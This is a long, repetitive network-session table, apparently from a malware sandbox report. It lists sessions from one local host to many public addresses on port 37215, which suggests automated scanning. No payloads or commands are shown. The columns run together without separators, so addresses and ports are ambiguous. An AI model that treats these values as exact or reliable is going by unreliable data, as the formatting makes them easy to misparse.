                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7299192.168.2.1542730156.71.108.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7300192.168.2.1533098156.248.165.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7301192.168.2.1555680156.145.59.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7302192.168.2.1547492156.33.190.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7303192.168.2.1533468156.208.219.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7304192.168.2.1546462156.3.154.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7305192.168.2.1557002156.90.78.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7306192.168.2.1546718156.215.58.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7307192.168.2.1548870156.171.161.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7308192.168.2.1559530156.109.177.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7309192.168.2.1535676156.6.52.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7310192.168.2.1550938156.38.150.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7311192.168.2.1541450156.46.130.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7312192.168.2.1538806156.120.6.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7313192.168.2.1556960156.223.240.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7314192.168.2.1538020156.239.60.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7315192.168.2.1538742156.158.46.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7316192.168.2.1560282156.44.26.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7317192.168.2.1537476156.165.190.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7318192.168.2.1554478156.55.100.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7319192.168.2.1542548156.205.135.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7320192.168.2.1542530156.234.30.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7321192.168.2.1544076156.62.151.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7322192.168.2.1540654156.65.21.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7323192.168.2.1534038156.52.252.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7324192.168.2.1548560156.226.154.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7325192.168.2.1538878156.4.234.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7326192.168.2.154971841.249.187.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7327192.168.2.155361241.212.82.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7328192.168.2.154733041.18.221.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7329192.168.2.154644641.131.122.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7330192.168.2.155917241.142.200.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7331192.168.2.155244041.86.27.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7332192.168.2.154604441.251.228.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7333192.168.2.154803241.198.146.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7334192.168.2.156072841.19.114.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7335192.168.2.155855041.56.86.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7336192.168.2.154668841.74.204.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7337192.168.2.154902041.140.26.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7338192.168.2.154732841.145.140.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7339192.168.2.155359641.153.115.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7340192.168.2.153836641.35.26.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7341192.168.2.153626241.52.50.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7342192.168.2.155801041.59.175.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7343192.168.2.155190841.21.133.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7344192.168.2.155287041.166.68.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7345192.168.2.156061841.166.164.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7346192.168.2.154029441.143.30.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7347192.168.2.154025641.27.181.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7348192.168.2.155253841.69.48.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7349192.168.2.154210241.209.8.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7350192.168.2.153448241.212.78.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7351192.168.2.155433241.219.27.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7352192.168.2.155189041.136.178.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7353192.168.2.154670241.160.200.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7354192.168.2.155082241.154.155.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7355192.168.2.154367441.26.70.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7356192.168.2.154785841.21.219.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7357192.168.2.153919241.131.98.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7358192.168.2.153501441.16.72.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7359192.168.2.154593841.14.212.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7360192.168.2.153619641.130.128.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7361192.168.2.154164641.235.240.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7362192.168.2.153558441.188.91.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7363192.168.2.155762641.61.124.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7364192.168.2.155777641.54.209.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7365192.168.2.153642241.47.157.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7366192.168.2.154156241.14.115.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7367192.168.2.153993241.205.209.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7368192.168.2.154634641.188.224.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7369192.168.2.154810441.6.7.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7370192.168.2.154480641.98.97.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7371192.168.2.153678241.105.5.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7372192.168.2.155771041.118.185.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7373192.168.2.153531441.59.107.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7374192.168.2.155020441.3.21.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7375192.168.2.155330441.113.161.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7376192.168.2.155412841.60.166.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7377192.168.2.153744841.171.3.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7378192.168.2.155843041.71.38.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7379192.168.2.153686641.117.17.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7380192.168.2.154132441.59.6.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7381192.168.2.154976641.111.142.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7382192.168.2.154665441.22.72.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7383192.168.2.155756841.183.48.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7384192.168.2.155719841.187.58.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7385192.168.2.153695641.59.189.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7386192.168.2.155383841.250.148.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7387192.168.2.154303641.77.121.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7388192.168.2.153590841.255.119.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7389192.168.2.156059241.138.142.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7390192.168.2.154349641.169.44.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7391192.168.2.154332641.105.111.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7392192.168.2.154723241.186.160.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7393192.168.2.153642641.58.202.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7394192.168.2.155788641.78.20.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7395192.168.2.155132641.160.149.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7396192.168.2.155160441.186.20.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7397192.168.2.153490441.108.25.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7398192.168.2.154522641.209.210.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7399192.168.2.154163441.167.142.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7400192.168.2.154537441.139.18.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7401192.168.2.154713041.195.94.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7402192.168.2.154014041.42.5.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7403192.168.2.154229641.124.186.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7404192.168.2.153657041.251.95.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7405192.168.2.154450641.199.142.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7406192.168.2.154419641.150.229.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7407192.168.2.156084241.62.229.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7408192.168.2.153603041.9.164.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7409192.168.2.153400241.8.115.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7410192.168.2.154365241.105.56.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7411192.168.2.154854241.117.227.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7412192.168.2.153824241.212.137.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7413192.168.2.154549241.171.254.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7414192.168.2.154039841.134.137.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7415192.168.2.156003241.71.96.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7416192.168.2.155672641.125.97.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7417192.168.2.154188841.114.245.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7418192.168.2.155993441.19.92.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7419192.168.2.154298641.113.92.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7420192.168.2.153789041.107.111.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7421192.168.2.153699841.238.248.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7422192.168.2.154866241.190.249.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7423192.168.2.153904241.23.179.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7424192.168.2.156006241.206.229.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7425192.168.2.155207441.172.252.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7426192.168.2.153633041.52.106.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7427192.168.2.155222441.192.116.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7428192.168.2.154670841.92.54.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7429192.168.2.154228441.116.157.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7430192.168.2.154363241.211.186.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7431192.168.2.154679641.52.126.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7432192.168.2.155453441.196.242.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7433192.168.2.155658841.40.84.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7434192.168.2.154476841.156.123.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7435192.168.2.154126441.249.178.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7436192.168.2.153639841.119.80.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7437192.168.2.156063241.82.205.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7438192.168.2.155140841.193.25.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7439192.168.2.154907841.49.220.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7440192.168.2.153885241.78.134.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7441192.168.2.155469841.58.191.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7442192.168.2.154552441.133.206.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7443192.168.2.154023241.242.228.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7444192.168.2.155616041.198.203.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7445192.168.2.153700841.189.254.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7446192.168.2.154667441.237.98.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7447192.168.2.155463441.4.10.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7448192.168.2.155420241.41.4.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7449192.168.2.154511641.188.63.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7450192.168.2.155550041.132.192.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7451192.168.2.155093641.3.149.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7452192.168.2.155359241.208.172.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7453192.168.2.155445041.14.49.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7454192.168.2.155430441.242.27.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7455192.168.2.154549641.37.95.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7456192.168.2.155561441.57.5.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7457192.168.2.155465841.154.19.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7458192.168.2.155223841.102.47.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7459192.168.2.153619241.215.221.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7460192.168.2.155898441.250.136.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7461192.168.2.155696041.235.211.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7462192.168.2.155730441.2.216.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7463192.168.2.154705241.110.38.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7464192.168.2.155178841.119.226.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7465192.168.2.155398241.177.35.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7466192.168.2.155285641.127.82.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7467192.168.2.155542641.9.113.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7468192.168.2.155543241.140.230.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7469192.168.2.153898841.167.166.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7470192.168.2.155113041.154.131.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7471192.168.2.154812241.152.0.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7472192.168.2.155452241.224.4.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7473192.168.2.154996241.161.61.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7474192.168.2.155664041.81.5.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7475192.168.2.155318041.0.217.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7476192.168.2.153707841.134.105.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7477192.168.2.154448841.128.196.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7478192.168.2.153400641.195.150.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7479192.168.2.155733641.13.162.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7480192.168.2.155904841.187.221.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7481192.168.2.155000041.18.123.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7482192.168.2.154268441.61.9.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7483192.168.2.153685641.207.41.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7484192.168.2.155038041.199.96.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7485192.168.2.155222441.47.48.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7486192.168.2.154486641.153.41.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7487192.168.2.155817441.18.145.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7488192.168.2.153606041.48.182.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7489192.168.2.155790041.189.229.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7490192.168.2.153875241.218.51.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7491192.168.2.153486641.211.158.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7492192.168.2.155692041.192.80.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7493192.168.2.155509641.31.68.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7494192.168.2.154067641.150.40.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7495192.168.2.153308441.75.8.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7496192.168.2.155314841.145.9.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7497192.168.2.153857641.52.254.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7498192.168.2.154249441.103.38.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7499192.168.2.155175041.244.209.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7500192.168.2.155019241.235.216.4337215
                                                                            TimestampBytes transferredDirectionData


